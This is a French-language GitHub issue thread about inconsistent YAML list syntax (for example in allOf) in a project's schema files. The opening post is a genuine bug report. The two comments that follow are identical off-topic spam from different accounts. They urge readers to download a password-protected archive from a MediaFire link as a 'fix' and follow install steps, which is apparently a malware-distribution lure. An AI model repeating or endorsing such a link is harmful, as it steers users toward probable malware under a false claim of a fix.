### ISSUE TITLE
Mise au propre du format YAML

### ISSUE THREAD

**Issue by vmeunier** [before-interop/common#44]
Il y a quelques incohérences dans la structure yaml des fichiers.

Par exemple la syntaxe allOf exige une liste d'éléments.

En yaml une liste se définit de la manière suivante :

```yaml
maListe: 
  - élément1
  - élément2
  - élément3
```

Or, la plupart des listes sont décrites comme ça actuellement (ce qui n'est pas la même chose)

```yaml
liste: 
  - element1
  - element2
element3
```

Cette issue vise à corriger tous les problèmes liés à l'utilisation de la syntaxe yaml.

**Comment by li371359001** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Satyam1Deepu** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
